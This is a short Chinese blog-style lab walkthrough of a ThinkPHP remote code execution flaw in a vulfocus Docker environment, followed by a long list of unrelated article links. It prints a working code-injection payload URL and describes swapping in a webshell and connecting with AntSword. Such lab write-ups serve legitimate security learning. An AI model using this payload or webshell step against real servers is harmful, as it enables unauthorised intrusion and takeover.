当前位置: 首页 > news >正文

thinkphp框架远程代码执行

一、环境

vulfocus网上自行下载

启动命令:

 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • MATLAB在算法处理上的作用
  • 鸿蒙系统学习指南
  • 学习大数据DAY30 python基础语法3
  • 渗透测试--DNS劫持实验
  • 5.0-软件工程基础知识-考点分析
  • 自用git命令(待完善)
  • 前端开源插件
  • 如何用Java编写Kafka生产者代码,实现定时向Kafka集群发送批量数据的功能?
  • 防御笔记第九天(持续更新)
  • C# 6.定时器 timer
  • linux系统编程中Shell脚本配置,及linux脚本中的man test
  • 【数据结构与算法】单链表、双链表和循环单链表中头指针未知的情况下能否删除某节点
  • Postman下载安装~用于springboot控制层测试
  • 【KAN】【API教程】get_fun
  • SolidEdge二次开发(C#)-环境配置
  • axios请求、和返回数据拦截,统一请求报错提示_012
  • express + mock 让前后台并行开发
  • JavaScript-Array类型
  • Laravel 中的一个后期静态绑定
  • spring-boot List转Page
  • SQLServer之创建数据库快照
  • text-decoration与color属性
  • Travix是如何部署应用程序到Kubernetes上的
  • vue 个人积累(使用工具,组件)
  • vuex 学习笔记 01
  • vue从创建到完整的饿了么(18)购物车详细信息的展示与删除
  • webpack入门学习手记(二)
  • Yii源码解读-服务定位器(Service Locator)
  • 海量大数据大屏分析展示一步到位:DataWorks数据服务+MaxCompute Lightning对接DataV最佳实践...
  • 检测对象或数组
  • 聊聊hikari连接池的leakDetectionThreshold
  • 使用parted解决大于2T的磁盘分区
  • 数据科学 第 3 章 11 字符串处理
  • 它承受着该等级不该有的简单, leetcode 564 寻找最近的回文数
  • 一加3T解锁OEM、刷入TWRP、第三方ROM以及ROOT
  • 移动端解决方案学习记录
  • 责任链模式的两种实现
  • 走向全栈之MongoDB的使用
  • ​一些不规范的GTID使用场景
  • %check_box% in rails :coditions={:has_many , :through}
  • (145)光线追踪距离场柔和阴影
  • (第二周)效能测试
  • (二十四)Flask之flask-session组件
  • (附源码)spring boot球鞋文化交流论坛 毕业设计 141436
  • (附源码)springboot青少年公共卫生教育平台 毕业设计 643214
  • (附源码)springboot人体健康检测微信小程序 毕业设计 012142
  • (理论篇)httpmoudle和httphandler一览
  • (亲测成功)在centos7.5上安装kvm,通过VNC远程连接并创建多台ubuntu虚拟机(ubuntu server版本)...
  • (三十五)大数据实战——Superset可视化平台搭建
  • (详细文档!)javaswing图书管理系统+mysql数据库
  • (学习日记)2024.03.12:UCOSIII第十四节:时基列表
  • (译)2019年前端性能优化清单 — 下篇
  • (轉貼) 資訊相關科系畢業的學生,未來會是什麼樣子?(Misc)
  • ****Linux下Mysql的安装和配置
  • ***通过什么方式***网吧